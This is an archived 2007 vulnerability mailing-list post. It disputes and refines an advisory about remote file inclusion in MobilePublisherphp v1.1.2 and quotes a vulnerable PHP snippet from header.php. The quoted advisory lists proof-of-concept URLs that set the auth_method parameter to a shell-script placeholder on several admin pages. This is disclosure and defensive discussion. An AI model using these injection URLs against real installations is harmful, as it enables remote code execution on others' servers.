[VIM] true until installed: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities
str0ke
str0ke at milw0rm.com
Sat Apr 14 17:19:04 UTC 2007
Once the product is installed it doesn't seem vulnerable since
require "../config.php";
contains the $auth_method variable.
After checking header.php in the root directory (the second included
file) it does seem vulnerable to rfi.
<?php
error_reporting (E_ALL & ~E_NOTICE);
$server = substr_replace($HTTP_SERVER_VARS[SERVER_SOFTWARE], '', 3, 50);
$mtime1 = explode(" ", microtime());
$starttime = $mtime1[1] + $mtime1[0];
require $abspath."/functions.php";
Then again this is a past vulnerability found by Timq.
http://www.milw0rm.com/exploits/2383
/str0ke
On 14 Apr 2007 06:36:31 -0000, the_3dit0r at yahoo.com
<the_3dit0r at yahoo.com> wrote:
> """""""""""""""""""""""""""""""""""""""""""""""
> """ :: :: ::::: :::: """
> """ :: :: :: : :: """
> """ :::: :: :: ::::: ::::: :::: """
> """ :: :: ::: ::: :: :: :: :: :: """
> """ :: :: :: : : ::::: :: :: :::: """
> """ """
> """""""""""""""""""""""""""""""""""""""""""""""
> Xmor$ Security Vulnerability Research TM
>
>
> # Tilte: MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities
>
>
> # Author..................: [the_Edit0r]
> # HomePage ...............: [Www.XmorS-sEcurity.coM]
> # Location ...............: [Iran]
> # Software ...............: [MobilePublisherphp]
> # Impact..................: [ Remote ]
> # Site Script ............: [http://sourceforge.net/projects/mpphp/]
> # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]
>
>
>
>
>
> ------------------------------- proof Of Concept ---------------------------
>
>
>
> www.example.com/[path]/admin/index.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/list.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/postreview.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/reindex.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/sections.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/templates.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/userinfo.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/users.php?auth_method=[Shell-Script]
> www.example.com/[path]/admin/view.php?auth_method=[Shell-Script]
>
>
> ----------------------------------------------------------------------------
>
>
>
>
>
> # Contact me : the_3dit0r[at]Yahoo[dot]coM
>
> # [XmorS-SEcurity.coM]
>
>
>
More information about the VIM
mailing list